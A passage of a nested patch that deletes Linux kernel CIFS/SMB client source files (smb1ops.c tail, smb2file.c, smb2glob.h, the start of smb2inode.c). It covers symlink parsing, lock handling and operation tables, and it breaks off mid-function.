+-	struct dfs_info3_param referral = {0};
+-
+-	rc = get_dfs_path(xid, tcon->ses, searchName, nls_codepage, &referral,
+-			  0);
+-
+-	if (!rc) {
+-		*symlinkinfo = kstrdup(referral.node_name, GFP_KERNEL);
+-		free_dfs_info_param(&referral);
+-		if (!*symlinkinfo)
+-			rc = -ENOMEM;
+-	}
+-	return rc;
+-#else /* No DFS support */
+-	return -EREMOTE;
+-#endif
+-}
+-
+-static int
+-cifs_query_symlink(const unsigned int xid, struct cifs_tcon *tcon,
+-		   struct cifs_sb_info *cifs_sb, const char *full_path,
+-		   char **target_path, bool is_reparse_point)
+-{
+-	int rc;
+-	int oplock = 0;
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-
+-	cifs_dbg(FYI, "%s: path: %s\n", __func__, full_path);
+-
+-	if (is_reparse_point) {
+-		cifs_dbg(VFS, "reparse points not handled for SMB1 symlinks\n");
+-		return -EOPNOTSUPP;
+-	}
+-
+-	/* Check for unix extensions */
+-	if (cap_unix(tcon->ses)) {
+-		rc = CIFSSMBUnixQuerySymLink(xid, tcon, full_path, target_path,
+-					     cifs_sb->local_nls,
+-					     cifs_remap(cifs_sb));
+-		if (rc == -EREMOTE)
+-			rc = cifs_unix_dfs_readlink(xid, tcon, full_path,
+-						    target_path,
+-						    cifs_sb->local_nls);
+-
+-		goto out;
+-	}
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = FILE_READ_ATTRIBUTES,
+-		.create_options = cifs_create_options(cifs_sb,
+-						      OPEN_REPARSE_POINT),
+-		.disposition = FILE_OPEN,
+-		.path = full_path,
+-		.fid = &fid,
+-	};
+-
+-	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+-	if (rc)
+-		goto out;
+-
+-	rc = CIFSSMBQuerySymLink(xid, tcon, fid.netfid, target_path,
+-				 cifs_sb->local_nls);
+-	if (rc)
+-		goto out_close;
+-
+-	convert_delimiter(*target_path, '/');
+-out_close:
+-	CIFSSMBClose(xid, tcon, fid.netfid);
+-out:
+-	if (!rc)
+-		cifs_dbg(FYI, "%s: target path: %s\n", __func__, *target_path);
+-	return rc;
+-}
+-
+-static bool
+-cifs_is_read_op(__u32 oplock)
+-{
+-	return oplock == OPLOCK_READ;
+-}
+-
+-static unsigned int
+-cifs_wp_retry_size(struct inode *inode)
+-{
+-	return CIFS_SB(inode->i_sb)->ctx->wsize;
+-}
+-
+-static bool
+-cifs_dir_needs_close(struct cifsFileInfo *cfile)
+-{
+-	return !cfile->srch_inf.endOfSearch && !cfile->invalidHandle;
+-}
+-
+-static bool
+-cifs_can_echo(struct TCP_Server_Info *server)
+-{
+-	if (server->tcpStatus == CifsGood)
+-		return true;
+-
+-	return false;
+-}
+-
+-static int
+-cifs_make_node(unsigned int xid, struct inode *inode,
+-	       struct dentry *dentry, struct cifs_tcon *tcon,
+-	       const char *full_path, umode_t mode, dev_t dev)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct inode *newinode = NULL;
+-	int rc = -EPERM;
+-	struct cifs_open_info_data buf = {};
+-	struct cifs_io_parms io_parms;
+-	__u32 oplock = 0;
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-	unsigned int bytes_written;
+-	struct win_dev *pdev;
+-	struct kvec iov[2];
+-
+-	if (tcon->unix_ext) {
+-		/*
+-		 * SMB1 Unix Extensions: requires server support but
+-		 * works with all special files
+-		 */
+-		struct cifs_unix_set_info_args args = {
+-			.mode	= mode & ~current_umask(),
+-			.ctime	= NO_CHANGE_64,
+-			.atime	= NO_CHANGE_64,
+-			.mtime	= NO_CHANGE_64,
+-			.device	= dev,
+-		};
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID) {
+-			args.uid = current_fsuid();
+-			args.gid = current_fsgid();
+-		} else {
+-			args.uid = INVALID_UID; /* no change */
+-			args.gid = INVALID_GID; /* no change */
+-		}
+-		rc = CIFSSMBUnixSetPathInfo(xid, tcon, full_path, &args,
+-					    cifs_sb->local_nls,
+-					    cifs_remap(cifs_sb));
+-		if (rc)
+-			return rc;
+-
+-		rc = cifs_get_inode_info_unix(&newinode, full_path,
+-					      inode->i_sb, xid);
+-
+-		if (rc == 0)
+-			d_instantiate(dentry, newinode);
+-		return rc;
+-	}
+-
+-	/*
+-	 * SMB1 SFU emulation: should work with all servers, but only
+-	 * support block and char device (no socket & fifo)
+-	 */
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL))
+-		return rc;
+-
+-	if (!S_ISCHR(mode) && !S_ISBLK(mode))
+-		return rc;
+-
+-	cifs_dbg(FYI, "sfu compat create special file\n");
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = GENERIC_WRITE,
+-		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR |
+-						      CREATE_OPTION_SPECIAL),
+-		.disposition = FILE_CREATE,
+-		.path = full_path,
+-		.fid = &fid,
+-	};
+-
+-	if (tcon->ses->server->oplocks)
+-		oplock = REQ_OPLOCK;
+-	else
+-		oplock = 0;
+-	rc = tcon->ses->server->ops->open(xid, &oparms, &oplock, &buf);
+-	if (rc)
+-		return rc;
+-
+-	/*
+-	 * BB Do not bother to decode buf since no local inode yet to put
+-	 * timestamps in, but we can reuse it safely.
+-	 */
+-
+-	pdev = (struct win_dev *)&buf.fi;
+-	io_parms.pid = current->tgid;
+-	io_parms.tcon = tcon;
+-	io_parms.offset = 0;
+-	io_parms.length = sizeof(struct win_dev);
+-	iov[1].iov_base = &buf.fi;
+-	iov[1].iov_len = sizeof(struct win_dev);
+-	if (S_ISCHR(mode)) {
+-		memcpy(pdev->type, "IntxCHR", 8);
+-		pdev->major = cpu_to_le64(MAJOR(dev));
+-		pdev->minor = cpu_to_le64(MINOR(dev));
+-		rc = tcon->ses->server->ops->sync_write(xid, &fid, &io_parms,
+-							&bytes_written, iov, 1);
+-	} else if (S_ISBLK(mode)) {
+-		memcpy(pdev->type, "IntxBLK", 8);
+-		pdev->major = cpu_to_le64(MAJOR(dev));
+-		pdev->minor = cpu_to_le64(MINOR(dev));
+-		rc = tcon->ses->server->ops->sync_write(xid, &fid, &io_parms,
+-							&bytes_written, iov, 1);
+-	}
+-	tcon->ses->server->ops->close(xid, tcon, &fid);
+-	d_drop(dentry);
+-
+-	/* FIXME: add code here to set EAs */
+-
+-	cifs_free_open_info(&buf);
+-	return rc;
+-}
+-
+-
+-
+-struct smb_version_operations smb1_operations = {
+-	.send_cancel = send_nt_cancel,
+-	.compare_fids = cifs_compare_fids,
+-	.setup_request = cifs_setup_request,
+-	.setup_async_request = cifs_setup_async_request,
+-	.check_receive = cifs_check_receive,
+-	.add_credits = cifs_add_credits,
+-	.set_credits = cifs_set_credits,
+-	.get_credits_field = cifs_get_credits_field,
+-	.get_credits = cifs_get_credits,
+-	.wait_mtu_credits = cifs_wait_mtu_credits,
+-	.get_next_mid = cifs_get_next_mid,
+-	.read_data_offset = cifs_read_data_offset,
+-	.read_data_length = cifs_read_data_length,
+-	.map_error = map_smb_to_linux_error,
+-	.find_mid = cifs_find_mid,
+-	.check_message = checkSMB,
+-	.dump_detail = cifs_dump_detail,
+-	.clear_stats = cifs_clear_stats,
+-	.print_stats = cifs_print_stats,
+-	.is_oplock_break = is_valid_oplock_break,
+-	.downgrade_oplock = cifs_downgrade_oplock,
+-	.check_trans2 = cifs_check_trans2,
+-	.need_neg = cifs_need_neg,
+-	.negotiate = cifs_negotiate,
+-	.negotiate_wsize = cifs_negotiate_wsize,
+-	.negotiate_rsize = cifs_negotiate_rsize,
+-	.sess_setup = CIFS_SessSetup,
+-	.logoff = CIFSSMBLogoff,
+-	.tree_connect = CIFSTCon,
+-	.tree_disconnect = CIFSSMBTDis,
+-	.get_dfs_refer = CIFSGetDFSRefer,
+-	.qfs_tcon = cifs_qfs_tcon,
+-	.is_path_accessible = cifs_is_path_accessible,
+-	.can_echo = cifs_can_echo,
+-	.query_path_info = cifs_query_path_info,
+-	.query_file_info = cifs_query_file_info,
+-	.get_srv_inum = cifs_get_srv_inum,
+-	.set_path_size = CIFSSMBSetEOF,
+-	.set_file_size = CIFSSMBSetFileSize,
+-	.set_file_info = smb_set_file_info,
+-	.set_compression = cifs_set_compression,
+-	.echo = CIFSSMBEcho,
+-	.mkdir = CIFSSMBMkDir,
+-	.mkdir_setinfo = cifs_mkdir_setinfo,
+-	.rmdir = CIFSSMBRmDir,
+-	.unlink = CIFSSMBDelFile,
+-	.rename_pending_delete = cifs_rename_pending_delete,
+-	.rename = CIFSSMBRename,
+-	.create_hardlink = CIFSCreateHardLink,
+-	.query_symlink = cifs_query_symlink,
+-	.open = cifs_open_file,
+-	.set_fid = cifs_set_fid,
+-	.close = cifs_close_file,
+-	.flush = cifs_flush_file,
+-	.async_readv = cifs_async_readv,
+-	.async_writev = cifs_async_writev,
+-	.sync_read = cifs_sync_read,
+-	.sync_write = cifs_sync_write,
+-	.query_dir_first = cifs_query_dir_first,
+-	.query_dir_next = cifs_query_dir_next,
+-	.close_dir = cifs_close_dir,
+-	.calc_smb_size = smbCalcSize,
+-	.oplock_response = cifs_oplock_response,
+-	.queryfs = cifs_queryfs,
+-	.mand_lock = cifs_mand_lock,
+-	.mand_unlock_range = cifs_unlock_range,
+-	.push_mand_locks = cifs_push_mandatory_locks,
+-	.query_mf_symlink = cifs_query_mf_symlink,
+-	.create_mf_symlink = cifs_create_mf_symlink,
+-	.is_read_op = cifs_is_read_op,
+-	.wp_retry_size = cifs_wp_retry_size,
+-	.dir_needs_close = cifs_dir_needs_close,
+-	.select_sectype = cifs_select_sectype,
+-#ifdef CONFIG_CIFS_XATTR
+-	.query_all_EAs = CIFSSMBQAllEAs,
+-	.set_EA = CIFSSMBSetEA,
+-#endif /* CIFS_XATTR */
+-	.get_acl = get_cifs_acl,
+-	.get_acl_by_fid = get_cifs_acl_by_fid,
+-	.set_acl = set_cifs_acl,
+-	.make_node = cifs_make_node,
+-};
+-
+-struct smb_version_values smb1_values = {
+-	.version_string = SMB1_VERSION_STRING,
+-	.protocol_id = SMB10_PROT_ID,
+-	.large_lock_type = LOCKING_ANDX_LARGE_FILES,
+-	.exclusive_lock_type = 0,
+-	.shared_lock_type = LOCKING_ANDX_SHARED_LOCK,
+-	.unlock_lock_type = 0,
+-	.header_preamble_size = 4,
+-	.header_size = sizeof(struct smb_hdr),
+-	.max_header_size = MAX_CIFS_HDR_SIZE,
+-	.read_rsp_size = sizeof(READ_RSP),
+-	.lock_cmd = cpu_to_le16(SMB_COM_LOCKING_ANDX),
+-	.cap_unix = CAP_UNIX,
+-	.cap_nt_find = CAP_NT_SMBS | CAP_NT_FIND,
+-	.cap_large_files = CAP_LARGE_FILES,
+-	.signing_enabled = SECMODE_SIGN_ENABLED,
+-	.signing_required = SECMODE_SIGN_REQUIRED,
+-};
+diff --git a/fs/cifs/smb2file.c b/fs/cifs/smb2file.c
+deleted file mode 100644
+index ba6cc50af390f..0000000000000
+--- a/fs/cifs/smb2file.c
++++ /dev/null
+@@ -1,371 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002, 2011
+- *   Author(s): Steve French (sfrench@us.ibm.com),
+- *              Pavel Shilovsky ((pshilovsky@samba.org) 2012
+- *
+- */
+-#include <linux/fs.h>
+-#include <linux/stat.h>
+-#include <linux/slab.h>
+-#include <linux/pagemap.h>
+-#include <asm/div64.h>
+-#include "cifsfs.h"
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "cifs_fs_sb.h"
+-#include "cifs_unicode.h"
+-#include "fscache.h"
+-#include "smb2proto.h"
+-#include "smb2status.h"
+-
+-static struct smb2_symlink_err_rsp *symlink_data(const struct kvec *iov)
+-{
+-	struct smb2_err_rsp *err = iov->iov_base;
+-	struct smb2_symlink_err_rsp *sym = ERR_PTR(-EINVAL);
+-	u32 len;
+-
+-	if (err->ErrorContextCount) {
+-		struct smb2_error_context_rsp *p, *end;
+-
+-		len = (u32)err->ErrorContextCount * (offsetof(struct smb2_error_context_rsp,
+-							      ErrorContextData) +
+-						     sizeof(struct smb2_symlink_err_rsp));
+-		if (le32_to_cpu(err->ByteCount) < len || iov->iov_len < len + sizeof(*err))
+-			return ERR_PTR(-EINVAL);
+-
+-		p = (struct smb2_error_context_rsp *)err->ErrorData;
+-		end = (struct smb2_error_context_rsp *)((u8 *)err + iov->iov_len);
+-		do {
+-			if (le32_to_cpu(p->ErrorId) == SMB2_ERROR_ID_DEFAULT) {
+-				sym = (struct smb2_symlink_err_rsp *)&p->ErrorContextData;
+-				break;
+-			}
+-			cifs_dbg(FYI, "%s: skipping unhandled error context: 0x%x\n",
+-				 __func__, le32_to_cpu(p->ErrorId));
+-
+-			len = ALIGN(le32_to_cpu(p->ErrorDataLength), 8);
+-			p = (struct smb2_error_context_rsp *)((u8 *)&p->ErrorContextData + len);
+-		} while (p < end);
+-	} else if (le32_to_cpu(err->ByteCount) >= sizeof(*sym) &&
+-		   iov->iov_len >= SMB2_SYMLINK_STRUCT_SIZE) {
+-		sym = (struct smb2_symlink_err_rsp *)err->ErrorData;
+-	}
+-
+-	if (!IS_ERR(sym) && (le32_to_cpu(sym->SymLinkErrorTag) != SYMLINK_ERROR_TAG ||
+-			     le32_to_cpu(sym->ReparseTag) != IO_REPARSE_TAG_SYMLINK))
+-		sym = ERR_PTR(-EINVAL);
+-
+-	return sym;
+-}
+-
+-int smb2_parse_symlink_response(struct cifs_sb_info *cifs_sb, const struct kvec *iov, char **path)
+-{
+-	struct smb2_symlink_err_rsp *sym;
+-	unsigned int sub_offs, sub_len;
+-	unsigned int print_offs, print_len;
+-	char *s;
+-
+-	if (!cifs_sb || !iov || !iov->iov_base || !iov->iov_len || !path)
+-		return -EINVAL;
+-
+-	sym = symlink_data(iov);
+-	if (IS_ERR(sym))
+-		return PTR_ERR(sym);
+-
+-	sub_len = le16_to_cpu(sym->SubstituteNameLength);
+-	sub_offs = le16_to_cpu(sym->SubstituteNameOffset);
+-	print_len = le16_to_cpu(sym->PrintNameLength);
+-	print_offs = le16_to_cpu(sym->PrintNameOffset);
+-
+-	if (iov->iov_len < SMB2_SYMLINK_STRUCT_SIZE + sub_offs + sub_len ||
+-	    iov->iov_len < SMB2_SYMLINK_STRUCT_SIZE + print_offs + print_len)
+-		return -EINVAL;
+-
+-	s = cifs_strndup_from_utf16((char *)sym->PathBuffer + sub_offs, sub_len, true,
+-				    cifs_sb->local_nls);
+-	if (!s)
+-		return -ENOMEM;
+-	convert_delimiter(s, '/');
+-	cifs_dbg(FYI, "%s: symlink target: %s\n", __func__, s);
+-
+-	*path = s;
+-	return 0;
+-}
+-
+-int smb2_open_file(const unsigned int xid, struct cifs_open_parms *oparms, __u32 *oplock, void *buf)
+-{
+-	int rc;
+-	__le16 *smb2_path;
+-	__u8 smb2_oplock;
+-	struct cifs_open_info_data *data = buf;
+-	struct smb2_file_all_info file_info = {};
+-	struct smb2_file_all_info *smb2_data = data ? &file_info : NULL;
+-	struct kvec err_iov = {};
+-	int err_buftype = CIFS_NO_BUFFER;
+-	struct cifs_fid *fid = oparms->fid;
+-	struct network_resiliency_req nr_ioctl_req;
+-
+-	smb2_path = cifs_convert_path_to_utf16(oparms->path, oparms->cifs_sb);
+-	if (smb2_path == NULL)
+-		return -ENOMEM;
+-
+-	oparms->desired_access |= FILE_READ_ATTRIBUTES;
+-	smb2_oplock = SMB2_OPLOCK_LEVEL_BATCH;
+-
+-	rc = SMB2_open(xid, oparms, smb2_path, &smb2_oplock, smb2_data, NULL, &err_iov,
+-		       &err_buftype);
+-	if (rc && data) {
+-		struct smb2_hdr *hdr = err_iov.iov_base;
+-
+-		if (unlikely(!err_iov.iov_base || err_buftype == CIFS_NO_BUFFER))
+-			goto out;
+-		if (hdr->Status == STATUS_STOPPED_ON_SYMLINK) {
+-			rc = smb2_parse_symlink_response(oparms->cifs_sb, &err_iov,
+-							 &data->symlink_target);
+-			if (!rc) {
+-				memset(smb2_data, 0, sizeof(*smb2_data));
+-				oparms->create_options |= OPEN_REPARSE_POINT;
+-				rc = SMB2_open(xid, oparms, smb2_path, &smb2_oplock, smb2_data,
+-					       NULL, NULL, NULL);
+-				oparms->create_options &= ~OPEN_REPARSE_POINT;
+-			}
+-		}
+-	}
+-
+-	if (rc)
+-		goto out;
+-
+-	if (oparms->tcon->use_resilient) {
+-		/* default timeout is 0, servers pick default (120 seconds) */
+-		nr_ioctl_req.Timeout =
+-			cpu_to_le32(oparms->tcon->handle_timeout);
+-		nr_ioctl_req.Reserved = 0;
+-		rc = SMB2_ioctl(xid, oparms->tcon, fid->persistent_fid,
+-			fid->volatile_fid, FSCTL_LMR_REQUEST_RESILIENCY,
+-			(char *)&nr_ioctl_req, sizeof(nr_ioctl_req),
+-			CIFSMaxBufSize, NULL, NULL /* no return info */);
+-		if (rc == -EOPNOTSUPP) {
+-			cifs_dbg(VFS,
+-			     "resiliency not supported by server, disabling\n");
+-			oparms->tcon->use_resilient = false;
+-		} else if (rc)
+-			cifs_dbg(FYI, "error %d setting resiliency\n", rc);
+-
+-		rc = 0;
+-	}
+-
+-	if (smb2_data) {
+-		/* if open response does not have IndexNumber field - get it */
+-		if (smb2_data->IndexNumber == 0) {
+-			rc = SMB2_get_srv_num(xid, oparms->tcon,
+-				      fid->persistent_fid,
+-				      fid->volatile_fid,
+-				      &smb2_data->IndexNumber);
+-			if (rc) {
+-				/*
+-				 * let get_inode_info disable server inode
+-				 * numbers
+-				 */
+-				smb2_data->IndexNumber = 0;
+-				rc = 0;
+-			}
+-		}
+-		memcpy(&data->fi, smb2_data, sizeof(data->fi));
+-	}
+-
+-	*oplock = smb2_oplock;
+-out:
+-	free_rsp_buf(err_buftype, err_iov.iov_base);
+-	kfree(smb2_path);
+-	return rc;
+-}
+-
+-int
+-smb2_unlock_range(struct cifsFileInfo *cfile, struct file_lock *flock,
+-		  const unsigned int xid)
+-{
+-	int rc = 0, stored_rc;
+-	unsigned int max_num, num = 0, max_buf;
+-	struct smb2_lock_element *buf, *cur;
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
+-	struct cifsLockInfo *li, *tmp;
+-	__u64 length = 1 + flock->fl_end - flock->fl_start;
+-	struct list_head tmp_llist;
+-
+-	INIT_LIST_HEAD(&tmp_llist);
+-
+-	/*
+-	 * Accessing maxBuf is racy with cifs_reconnect - need to store value
+-	 * and check it before using.
+-	 */
+-	max_buf = tcon->ses->server->maxBuf;
+-	if (max_buf < sizeof(struct smb2_lock_element))
+-		return -EINVAL;
+-
+-	BUILD_BUG_ON(sizeof(struct smb2_lock_element) > PAGE_SIZE);
+-	max_buf = min_t(unsigned int, max_buf, PAGE_SIZE);
+-	max_num = max_buf / sizeof(struct smb2_lock_element);
+-	buf = kcalloc(max_num, sizeof(struct smb2_lock_element), GFP_KERNEL);
+-	if (!buf)
+-		return -ENOMEM;
+-
+-	cur = buf;
+-
+-	cifs_down_write(&cinode->lock_sem);
+-	list_for_each_entry_safe(li, tmp, &cfile->llist->locks, llist) {
+-		if (flock->fl_start > li->offset ||
+-		    (flock->fl_start + length) <
+-		    (li->offset + li->length))
+-			continue;
+-		if (current->tgid != li->pid)
+-			/*
+-			 * flock and OFD lock are associated with an open
+-			 * file description, not the process.
+-			 */
+-			if (!(flock->fl_flags & (FL_FLOCK | FL_OFDLCK)))
+-				continue;
+-		if (cinode->can_cache_brlcks) {
+-			/*
+-			 * We can cache brlock requests - simply remove a lock
+-			 * from the file's list.
+-			 */
+-			list_del(&li->llist);
+-			cifs_del_lock_waiters(li);
+-			kfree(li);
+-			continue;
+-		}
+-		cur->Length = cpu_to_le64(li->length);
+-		cur->Offset = cpu_to_le64(li->offset);
+-		cur->Flags = cpu_to_le32(SMB2_LOCKFLAG_UNLOCK);
+-		/*
+-		 * We need to save a lock here to let us add it again to the
+-		 * file's list if the unlock range request fails on the server.
+-		 */
+-		list_move(&li->llist, &tmp_llist);
+-		if (++num == max_num) {
+-			stored_rc = smb2_lockv(xid, tcon,
+-					       cfile->fid.persistent_fid,
+-					       cfile->fid.volatile_fid,
+-					       current->tgid, num, buf);
+-			if (stored_rc) {
+-				/*
+-				 * We failed on the unlock range request - add
+-				 * all locks from the tmp list to the head of
+-				 * the file's list.
+-				 */
+-				cifs_move_llist(&tmp_llist,
+-						&cfile->llist->locks);
+-				rc = stored_rc;
+-			} else
+-				/*
+-				 * The unlock range request succeed - free the
+-				 * tmp list.
+-				 */
+-				cifs_free_llist(&tmp_llist);
+-			cur = buf;
+-			num = 0;
+-		} else
+-			cur++;
+-	}
+-	if (num) {
+-		stored_rc = smb2_lockv(xid, tcon, cfile->fid.persistent_fid,
+-				       cfile->fid.volatile_fid, current->tgid,
+-				       num, buf);
+-		if (stored_rc) {
+-			cifs_move_llist(&tmp_llist, &cfile->llist->locks);
+-			rc = stored_rc;
+-		} else
+-			cifs_free_llist(&tmp_llist);
+-	}
+-	up_write(&cinode->lock_sem);
+-
+-	kfree(buf);
+-	return rc;
+-}
+-
+-static int
+-smb2_push_mand_fdlocks(struct cifs_fid_locks *fdlocks, const unsigned int xid,
+-		       struct smb2_lock_element *buf, unsigned int max_num)
+-{
+-	int rc = 0, stored_rc;
+-	struct cifsFileInfo *cfile = fdlocks->cfile;
+-	struct cifsLockInfo *li;
+-	unsigned int num = 0;
+-	struct smb2_lock_element *cur = buf;
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-
+-	list_for_each_entry(li, &fdlocks->locks, llist) {
+-		cur->Length = cpu_to_le64(li->length);
+-		cur->Offset = cpu_to_le64(li->offset);
+-		cur->Flags = cpu_to_le32(li->type |
+-						SMB2_LOCKFLAG_FAIL_IMMEDIATELY);
+-		if (++num == max_num) {
+-			stored_rc = smb2_lockv(xid, tcon,
+-					       cfile->fid.persistent_fid,
+-					       cfile->fid.volatile_fid,
+-					       current->tgid, num, buf);
+-			if (stored_rc)
+-				rc = stored_rc;
+-			cur = buf;
+-			num = 0;
+-		} else
+-			cur++;
+-	}
+-	if (num) {
+-		stored_rc = smb2_lockv(xid, tcon,
+-				       cfile->fid.persistent_fid,
+-				       cfile->fid.volatile_fid,
+-				       current->tgid, num, buf);
+-		if (stored_rc)
+-			rc = stored_rc;
+-	}
+-
+-	return rc;
+-}
+-
+-int
+-smb2_push_mandatory_locks(struct cifsFileInfo *cfile)
+-{
+-	int rc = 0, stored_rc;
+-	unsigned int xid;
+-	unsigned int max_num, max_buf;
+-	struct smb2_lock_element *buf;
+-	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
+-	struct cifs_fid_locks *fdlocks;
+-
+-	xid = get_xid();
+-
+-	/*
+-	 * Accessing maxBuf is racy with cifs_reconnect - need to store value
+-	 * and check it for zero before using.
+-	 */
+-	max_buf = tlink_tcon(cfile->tlink)->ses->server->maxBuf;
+-	if (max_buf < sizeof(struct smb2_lock_element)) {
+-		free_xid(xid);
+-		return -EINVAL;
+-	}
+-
+-	BUILD_BUG_ON(sizeof(struct smb2_lock_element) > PAGE_SIZE);
+-	max_buf = min_t(unsigned int, max_buf, PAGE_SIZE);
+-	max_num = max_buf / sizeof(struct smb2_lock_element);
+-	buf = kcalloc(max_num, sizeof(struct smb2_lock_element), GFP_KERNEL);
+-	if (!buf) {
+-		free_xid(xid);
+-		return -ENOMEM;
+-	}
+-
+-	list_for_each_entry(fdlocks, &cinode->llist, llist) {
+-		stored_rc = smb2_push_mand_fdlocks(fdlocks, xid, buf, max_num);
+-		if (stored_rc)
+-			rc = stored_rc;
+-	}
+-
+-	kfree(buf);
+-	free_xid(xid);
+-	return rc;
+-}
+diff --git a/fs/cifs/smb2glob.h b/fs/cifs/smb2glob.h
+deleted file mode 100644
+index 82e916ad167c0..0000000000000
+--- a/fs/cifs/smb2glob.h
++++ /dev/null
+@@ -1,44 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Definitions for various global variables and structures
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002, 2011
+- *                 Etersoft, 2012
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *              Jeremy Allison (jra@samba.org)
+- *              Pavel Shilovsky (pshilovsky@samba.org) 2012
+- *
+- */
+-#ifndef _SMB2_GLOB_H
+-#define _SMB2_GLOB_H
+-
+-/*
+- *****************************************************************
+- * Constants go here
+- *****************************************************************
+- */
+-
+-/*
+- * Identifiers for functions that use the open, operation, close pattern
+- * in smb2inode.c:smb2_compound_op()
+- */
+-#define SMB2_OP_SET_DELETE 1
+-#define SMB2_OP_SET_INFO 2
+-#define SMB2_OP_QUERY_INFO 3
+-#define SMB2_OP_QUERY_DIR 4
+-#define SMB2_OP_MKDIR 5
+-#define SMB2_OP_RENAME 6
+-#define SMB2_OP_DELETE 7
+-#define SMB2_OP_HARDLINK 8
+-#define SMB2_OP_SET_EOF 9
+-#define SMB2_OP_RMDIR 10
+-#define SMB2_OP_POSIX_QUERY_INFO 11
+-
+-/* Used when constructing chained read requests. */
+-#define CHAINED_REQUEST 1
+-#define START_OF_CHAIN 2
+-#define END_OF_CHAIN 4
+-#define RELATED_REQUEST 8
+-
+-#endif	/* _SMB2_GLOB_H */
+diff --git a/fs/cifs/smb2inode.c b/fs/cifs/smb2inode.c
+deleted file mode 100644
+index c97e049e29dd3..0000000000000
+--- a/fs/cifs/smb2inode.c
++++ /dev/null
+@@ -1,799 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002, 2011
+- *                 Etersoft, 2012
+- *   Author(s): Pavel Shilovsky (pshilovsky@samba.org),
+- *              Steve French (sfrench@us.ibm.com)
+- *
+- */
+-#include <linux/fs.h>
+-#include <linux/stat.h>
+-#include <linux/slab.h>
+-#include <linux/pagemap.h>
+-#include <asm/div64.h>
+-#include "cifsfs.h"
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "cifs_fs_sb.h"
+-#include "cifs_unicode.h"
+-#include "fscache.h"
+-#include "smb2glob.h"
+-#include "smb2pdu.h"
+-#include "smb2proto.h"
+-#include "cached_dir.h"
+-#include "smb2status.h"
+-
+-static void
+-free_set_inf_compound(struct smb_rqst *rqst)
+-{
+-	if (rqst[1].rq_iov)
+-		SMB2_set_info_free(&rqst[1]);
+-	if (rqst[2].rq_iov)
+-		SMB2_close_free(&rqst[2]);
+-}
+-
+-
+-struct cop_vars {
+-	struct cifs_open_parms oparms;
+-	struct kvec rsp_iov[3];
+-	struct smb_rqst rqst[3];
+-	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
+-	struct kvec qi_iov[1];
+-	struct kvec si_iov[SMB2_SET_INFO_IOV_SIZE];
+-	struct kvec close_iov[1];
+-	struct smb2_file_rename_info rename_info;
+-	struct smb2_file_link_info link_info;
+-};
+-
+-/*
+- * note: If cfile is passed, the reference to it is dropped here.
+- * So make sure that you do not reuse cfile after return from this func.
+- *
+- * If passing @err_iov and @err_buftype, ensure to make them both large enough (>= 3) to hold all
+- * error responses.  Caller is also responsible for freeing them up.
+- */
+-static int smb2_compound_op(const unsigned int xid, struct cifs_tcon *tcon,
+-			    struct cifs_sb_info *cifs_sb, const char *full_path,
+-			    __u32 desired_access, __u32 create_disposition, __u32 create_options,
+-			    umode_t mode, void *ptr, int command, struct cifsFileInfo *cfile,
+-			    struct kvec *err_iov, int *err_buftype)
+-{
+-	struct cop_vars *vars = NULL;
+-	struct kvec *rsp_iov;
+-	struct smb_rqst *rqst;
+-	int rc;
+-	__le16 *utf16_path = NULL;
+-	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	struct cifs_fid fid;
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server;
+-	int num_rqst = 0;
+-	int resp_buftype[3];
+-	struct smb2_query_info_rsp *qi_rsp = NULL;
+-	struct cifs_open_info_data *idata;
+-	int flags = 0;
+-	__u8 delete_pending[8] = {1, 0, 0, 0, 0, 0, 0, 0};
+-	unsigned int size[2];
+-	void *data[2];
+-	int len;
+-
+-	vars = kzalloc(sizeof(*vars), GFP_ATOMIC);
+-	if (vars == NULL)
+-		return -ENOMEM;
+-	rqst = &vars->rqst[0];
+-	rsp_iov = &vars->rsp_iov[0];
+-
+-	server = cifs_pick_channel(ses);
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	resp_buftype[0] = resp_buftype[1] = resp_buftype[2] = CIFS_NO_BUFFER;
+-
+-	/* We already have a handle so we can skip the open */
+-	if (cfile)
+-		goto after_open;
+-
+-	/* Open */
+-	utf16_path = cifs_convert_path_to_utf16(full_path, cifs_sb);
+-	if (!utf16_path) {
+-		rc = -ENOMEM;
+-		goto finished;
+-	}
+-
+-	vars->oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = full_path,
+-		.desired_access = desired_access,
+-		.disposition = create_disposition,
+-		.create_options = cifs_create_options(cifs_sb, create_options),
+-		.fid = &fid,
+-		.mode = mode,
+-		.cifs_sb = cifs_sb,
+-	};
+-
+-	rqst[num_rqst].rq_iov = &vars->open_iov[0];
+-	rqst[num_rqst].rq_nvec = SMB2_CREATE_IOV_SIZE;
+-	rc = SMB2_open_init(tcon, server,
